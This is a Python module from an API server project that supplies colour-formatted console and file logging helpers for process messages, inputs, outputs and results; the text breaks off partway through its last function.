_serverApp/_logProcessServices.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
import os
import sys
import datetime
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
import _appEnvironment as thisApp
from _appEnvironment import FILELOG_ON,CONSOLE_ON,DEBUG_ON,log_file_name,log_errors_file_name
from _colorServices import colorized_text, apply_colors, colorized_string, Fore, Back, Style, default_colors_template, colors_template_result, colors_template_changes, xcolors, fix_colors, clean_colors
from _moduleConfigServices import retrieve_module_configuration
import textwrap
import pprint
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#globals
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
global_max_print_line_width = 100
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# print services
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def factorial(n,d,s):
print("n=",n,'d=',d,'s=',s)
if not d or type(d) == type('') or not (type(d) == type([]) or type(d) == type({}) or type(d) == type(())):
if type(d) == type(''):
ds = f"'{d}'"
else:
ds=str(d)
return(0,'',ds)
else:
if type(d) == type([]):
if n < len(d):
if n == 0:
s = s + '['
w = d[n]
print('wwwwww', w,'n=',n,'l=',len(d))
if type(w) == type({}):
x = 1
(nn, nd, ns) = factorial(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + ']'
else:
s = s + ', '
return factorial(n + 1, d, s)
else:
return (0,'','')
elif type(d) == type({}):
if n < len(d):
if n == 0:
s = s + '{'
keys = list(d.keys())
k = keys[n]
w = d.get(k)
s = s + f"'{k}':"
(nn, nd, ns) = factorial(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + '}'
else:
s = s + ', '
return factorial(n + 1, d, s)
else:
return (0, '', s)
else:
return(0,'',s)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#print(factorial(0, ['aaaa', ['1111', 3.345, '3333', ['1', '2', '3']], 'cccc', {'xxxx':1111, 'zzzzz':3333}], ''))
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def decorated_data_recursion_nocolors(n,d,s):
# print("n=",n,'d=',d,'s=',s)
if not d or type(d) == type('') or not (type(d) == type([]) or type(d) == type({}) or type(d) == type(())):
if type(d) == type(''):
ds = f"'{d}'"
else:
ds=str(d)
return(0,'',ds)
else:
if type(d) == type([]):
if n < len(d):
if n == 0:
s = s + '['
w = d[n]
# print('next item:', w,'n=',n,'l=',len(d))
(nn, nd, ns) = decorated_data_recursion_nocolors(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + ']'
else:
s = s + ', '
return decorated_data_recursion_nocolors(n + 1, d, s)
else:
return (0,'',s)
elif type(d) == type({}):
if n < len(d):
if n == 0:
s = s + '{'
keys = list(d.keys())
k = keys[n]
w = d.get(k)
s = s + f"'{k}':"
(nn, nd, ns) = decorated_data_recursion_nocolors(0, w, '')
s = s + ns
if n >= len(d)-1:
s = s + '}'
else:
s = s + ', '
return decorated_data_recursion_nocolors(n + 1, d, s)
else:
return (0, '', s)
else:
return(0,'',s)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_colors_template(template):
if not template:
return default_colors_template
if template:
if type(template) == type({}):
colors_template = template
elif type(template) == type(''):
if template.strip().upper() == 'RESULT':
colors_template = colors_template_result
elif template.strip().upper() == 'CHANGES':
colors_template = colors_template_changes
elif template.strip().upper() == 'MONOCHROME':
colors_template = colors_template_changes
else:
colors_template = colors_template
elif type(template) == type([]):
colors_template = colors_template
else:
colors_template = colors_template
return colors_template
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_template_compo(compo,what='',default='',colors_template={}):
if what:
color = colors_template.get(compo, {}).get(what)
if color:
return color
color = colors_template.get(compo)
if type(color)==type({}):
if compo.lower().find('key')>=0:
color = colors_template.get(compo, {}).get('key_color')
if not color:
color = colors_template.get(compo, {}).get('data_color')
elif compo.lower().find('data')>=0:
color = colors_template.get(compo, {}).get('data_color')
if not color:
color = colors_template.get(compo, {}).get('key_color')
if not color:
color=default
return color
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_template_dict_compos(colors_template,level=0):
c0=None
for k in ('[', ']', '{', '}'):
c0 = get_template_compo(k, '', '', colors_template)
if c0:
break
if not c0:
c0 = '#YELLOW#'
k='level_'+str(level)+'_dict_key'
c1 = get_template_compo(k, '', '', colors_template)
if not c1:
c1 = get_template_compo('dict_key', '', '#BLUE#', colors_template)
k='level_'+str(level)+'_dict_data'
c2 = get_template_compo(k, '', '', colors_template)
if not c2:
c2 = get_template_compo('dict_key', '', '#WHITE#', colors_template)
# if 1==2:
# k='level_'+str(level)+'_dict_keys'
# c1 = get_template_compo(k, '', '', colors_template)
# if not c1:
# c1 = get_template_compo('dict_keys', '', '#BLUE#', colors_template)
# k='level_'+str(level)+'_dict_data'
# c2 = get_template_compo(k, '', '', colors_template)
# if not c2:
# c2=get_template_compo('dict_data','','#WHITE#',colors_template)
return (c0, c1, c2)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def decorated_data_recursion(n,d,s,colors_template={},level=0):
# print("n=",n,'d=',d,'s=',s)
(c0, c1, c2) = get_template_dict_compos(colors_template,level)
if not d or type(d) == type('') or not (type(d) == type([]) or type(d) == type({}) or type(d) == type(())):
if d == None:
ds = str(d)
else:
ds=d
return(0,'',ds)
else:
if type(d) == type([]):
k = 'array_item_' + str(n + 1)
ck=get_template_compo(k,'key_color',c1,colors_template)
cd=get_template_compo(k,'data_color',c2,colors_template)
if n < len(d):
if n == 0:
s = s + '['
w = d[n]
# print('next item:', w,'n=',n,'l=',len(d))
(nn, nd, ns) = decorated_data_recursion(0, w, '', colors_template, level)
if type(ns) == type(''):
ds = f"#C0#'{cd}{ns}#C0#'"
else:
ds=f"{cd}{d}#C0#"
s = s + ds
if n >= len(d)-1:
s = s + ']'
else:
s = s + ', '
return decorated_data_recursion(n + 1, d, s, colors_template, level)
else:
return (0,'',s)
elif type(d) == type({}):
if n < len(d):
if n == 0:
level = level + 1
(c0, c1, c2) = get_template_dict_compos(colors_template,level)
s = s + c0+'{'
keys = list(d.keys())
k = keys[n]
w = d.get(k)
ck=get_template_compo(k,'key_color',c1,colors_template)
cd=get_template_compo(k,'data_color',c2,colors_template)
s = s + f"#C0#'{ck}{k}#C0#':"
(nn, nd, ns) = decorated_data_recursion(0, w, '', colors_template, level)
cd = colors_template.get(k,{}).get('key_color',cd)
cd = colors_template.get(str(ns), {}).get('data_color', cd)
if k.lower().find('status') >= 0:
if str(ns).lower() == 'success':
cd='#GREEN#'
colors_template.update({'status_color': cd})
elif str(ns).lower().find('error') >= 0:
cd='#RED#'
colors_template.update({'status_color': cd})
elif str(ns).lower().find('warning') >= 0:
cd='#YELLOW#'
colors_template.update({'status_color': cd})
if k.lower().find('message') >= 0:
cd=colors_template.get('status_color','#WHITE#')
if type(ns) == type(''):
ds = f"#C0#'{cd}{ns}#C0#'"
else:
ds=f"{cd}{ns}#C0#"
s = s + ds
if n >= len(d) - 1:
s = s + c0+'}'
level = level - 1
(c0, c1, c2) = get_template_dict_compos(colors_template,level)
else:
s = s + ', '
return decorated_data_recursion(n + 1, d, s, colors_template, level)
else:
return (0, '', s)
else:
return (0, '', s)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def decorated_data(data, colors_template={}):
colors_template = get_colors_template(colors_template)
(dummy1, dummy2, thisText) = decorated_data_recursion(0, data, '',colors_template,0)
return str(thisText)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def bobbi_starr(msgtext,initial_indent="", subsequent_indent="", break_long_words=True, width=0):
if width < 20:
width = global_max_print_line_width
text = fix_colors(msgtext)
#print(text)
lines = []
ix=-1
x = False
line = ''
lw=0
for ix in range(0,len(text)):
c = text[ix]
line = line + c
if c == '#':
x = not (x)
continue
if not x:
lw=lw+1
if lw == width:
lines.append(line.strip())
line = ''
lw=0
lines.append(line.strip())
# line = text[0:width]
# #print(ix,line+'|', len(line))
# text = text[width:]
# #print(ix,text, len(text))
# lines.append(line)
# if not text:
# break
newText=""
for ix in range(0, len(lines)):
line = initial_indent+ lines[ix]
if ix <len(lines)-1:
line=line+"\n"
newText = newText + line
return newText
# new_text = textwrap.fill(dedented_text, initial_indent=indent, subsequent_indent=indent + '\t', break_long_words=True, break_on_hyphens=True, width=width)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def text_wrap(msgText, printLevel=0,width=-1):
indent = "\t" * printLevel
if width < 20:
width = global_max_print_line_width
dedented_text = textwrap.dedent(msgText).strip()
return bobbi_starr(dedented_text,initial_indent=indent, subsequent_indent=indent + '\t', break_long_words=True, width=width)
# if printLevel <= 0:
# # new_text = textwrap.fill(dedented_text, initial_indent=indent, subsequent_indent=indent + '\t', break_long_words=True, width=width)
# return msgText
# else:
# new_text = textwrap.fill(dedented_text, initial_indent=indent, subsequent_indent=indent + '\t', break_long_words=True, break_on_hyphens=True, width=width)
# return new_text
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_msg(msg_text, **kwargs):
if CONSOLE_ON:
msgText = text_wrap(msg_text, kwargs.get('indent_level', 0), kwargs.get('width',0))
msgText = colorized_text(msgText, kwargs.get('color_template',''))
print(msgText)
if FILELOG_ON or kwargs.get('msg_type', '').upper().find('ERROR') >= 0 or msg_text.upper().find('ERROR') >= 0:
msgText = clean_colors(msg_text)
msgJson1 = f"dt:'{str(datetime.datetime.utcnow())}', module:'{kwargs.get('process_name','')}', msg='{msgText.strip()}'"
msgJson = '{'+msgJson1+'}\n'
if kwargs.get('msg_type', '').upper().find('ERROR') >= 0 or msg_text.upper().find('ERROR') >= 0:
errorsFile = kwargs.get('errors_file', '')
if not errorsFile:
errorsFile = thisApp.log_errors_file_name
if errorsFile:
f = open(errorsFile, "a+")
f.write(msgText)
f.close
if FILELOG_ON:
log_files=[]
# log_file = kwargs.get('log_file','')
# if not log_file:
# log_file = thisApp.log_file_name
# if log_file:
# log_files.append(log_file)
xdebug_files = kwargs.get('debug_files', [])
if xdebug_files:
if type(xdebug_files) == type(''):
f_array = xdebug_files.split(';')
for ix in range(0, len(f_array)):
if f_array[ix]:
log_files.append(f_array[ix])
elif type(xdebug_files) == type([]):
for ix in range(0, len(xdebug_files)):
if xdebug_files[ix]:
log_files.append(xdebug_files[ix])
for logFile in log_files:
if logFile:
f = open(logFile, "a+")
f.write(msgJson)
f.close
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_message(process_id='', msgType='', msg_data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type='message'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', False)
if not msgtype_debug:
return
else:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', True)
if not msgtype_debug:
return
msg_type = msgType
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
if msg_type.lower().find('error') >= 0:
c1 = '#RED#'
c2 = '#YELLOW#'
elif msg_type.lower().find('success') >= 0 or msg_type.lower().find('ok') >= 0:
c1 = '#GREEN#'
c2 = '#YELLOW#'
elif msg_type.lower().find('warning') >= 0:
c1 = '#YELLOW#'
c2 = '#WHITE#'
else:
c1 = '#WHITE#'
c2 = '#YELLOW#'
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
if msg_type:
msg_id = f"{c1}{msg_type.lower()} message#C0#: "
else:
msg_id = '#C0#: '
if not process_id:
msg_id = ''
if process_id:
msg_id = ' ' + msg_id
msg_data_prefix =''
msg_data = c2+decorated_data(msg_data, kwargs.get('colors_template',''))+'#C0#'
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_result_message(process_id='', msgType='', msg_data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type='result_message'
data_name = kwargs.get('data_name', '')
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', False)
if not msgtype_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
else:
msgtype_debug = kwargs.get(msgType + '_' + msg_type + '_debug', True)
if not msgtype_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
msg_type = msgType
indent_method = kwargs.get('indent_method', 'SAME_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
if msg_type.lower().find('error') >= 0:
c1 = '#RED#'
c2 = '#YELLOW#'
elif msg_type.lower().find('success') >= 0 or msg_type.lower().find('ok') >= 0:
c1 = '#GREEN#'
c2 = '#YELLOW#'
elif msg_type.lower().find('warning') >= 0:
c1 = '#YELLOW#'
c2 = '#MAGENTA#'
else:
c1 = '#WHITE#'
c2 = '#YELLOW#'
msg_type=''
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
if msg_type:
msg_id = f"{c1}{msg_type.lower()} result message#C0#: "
else:
msg_id = '#C0#: '
if not process_id:
msg_id = ''
if process_id:
msg_id = ' ' + msg_id
msg_data_prefix =''
msg_data = c2+decorated_data(msg_data, kwargs.get('colors_template',''))+'#C0#'
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_result(process_id='',result_data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'result'
data_name = kwargs.get('data_name', '')
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'CALL_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'result: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data = decorated_data(result_data, kwargs.get('colors_template',''))+'#C0#'
if not result_data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_output(process_id='',result_data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'output'
data_name = kwargs.get('data_name', '')
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'result: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data = decorated_data(result_data, kwargs.get('colors_template',''))+'#C0#'
if not result_data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_input(process_id='',data_name='',data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled', None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'input'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if data_name=='caller_area':
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'input: '
msg_data_prefix =''
if data_name:
msg_data_prefix = f"{data_name}="
else:
msg_data_prefix = f""
msg_data = decorated_data(data, kwargs.get('colors_template',''))+'#C0#'
if data == None:
msg_data_prefix='#WHITE#'+msg_data_prefix
msg_data='#RED#'+msg_data
else:
msg_data_prefix='#WHITE#'+msg_data_prefix
msg_data='#XBLUE#'+msg_data
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type,'data_name':data_name})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_data(process_id='',data_name='',data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'data'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'data: '
msg_data_prefix =''
if data_name:
msg_data_prefix = f"{data_name}="
else:
msg_data_prefix = f""
msg_data = decorated_data(data, kwargs.get('colors_template',''))+'#C0#'
if not data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
else:
msg_data_prefix='#WHITE#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type,'data_name':data_name})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_parameter(process_id='', param_prefix='', data_name='', data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'parameter'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', False)
if not data_debug:
return
else:
data_debug = kwargs.get(data_name + '_' + msg_type + '_debug', True)
if not data_debug:
return
indent_method = kwargs.get('indent_method', 'NEXT_LEVEL')
indent_level = kwargs.get('indent_level',0)
if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
if param_prefix:
param_prefix = param_prefix+':'
msg_data_prefix =''
if data_name:
msg_data_prefix = f"{data_name}#C0#="
else:
msg_data_prefix = f""
msg_data = decorated_data(data, kwargs.get('colors_template',''))+'#C0#'
if not data:
msg_data='#RED#'+msg_data
msg_data_prefix='#RED#'+msg_data_prefix
else:
msg_data='#YELLOW#'+msg_data
msg_data_prefix='#XBLUE#'+msg_data_prefix
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + param_prefix + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type,'data_name':data_name})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_start(process_id='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'start'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
return
indent_method = kwargs.get('indent_method', 'CALL_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'start: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data =''
if kwargs.get('start_data',''):
msg_data = decorated_data(kwargs.get('start_data', ''), kwargs.get('colors_template', '')) + '#C0#'
if process_id:
msg_id = ' ' + msg_id
msg_text = '#C0#' + msg_prefix + '#C0#' + msg_id + '#C0#' + msg_data_prefix + '#C0#' + msg_data + '#C0#'
kwargs.update({'indent_level':indent_level,'msg_type':msg_type})
log_msg(msg_text, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def log_process_finish(process_id='',result_data='', **kwargs):
# print(kwargs)
debug_level = kwargs.get('debug_level', -1)
filelog_enabled = kwargs.get('filelog_enabled',None)
print_enabled = kwargs.get('print_enabled',None)
if debug_level >0 and (FILELOG_ON or CONSOLE_ON or filelog_enabled or print_enabled):
pass
else:
return
msg_type = 'finish'
msg_type_debug = kwargs.get(msg_type + '_debug', True)
if not msg_type_debug:
return
indent_method = kwargs.get('indent_method', 'CALL_LEVEL')
indent_level = kwargs.get('indent_level',0)
# if not (indent_method.upper().replace('_', '').replace('-', '').strip() in ('CALLLEVEL', 'SAMELEVEL', 'NOINDENT')):
# indent_level = indent_level + 1
msg_prefix = f"#C9#{process_id}#C0#"
if kwargs.get('msg_formatting', '').upper() == 'AUTO':
msg_prefix = f"#C9#{process_id}#C0# #C1#{kwargs.get('process_entity','')}#C0# action #C2#{kwargs.get('process_action','').upper()}#C0#"
msg_id = 'finish: '
msg_data_prefix =''
if kwargs.get('data_name',''):
msg_data_prefix = f"{kwargs.get('data_name','')}="
else:
msg_data_prefix = f""
msg_data = decorated_data(result_data, kwargs.get('colors_template',''))+'#C0#'
if not result_data:
msg_data='#RED#'+msg_data
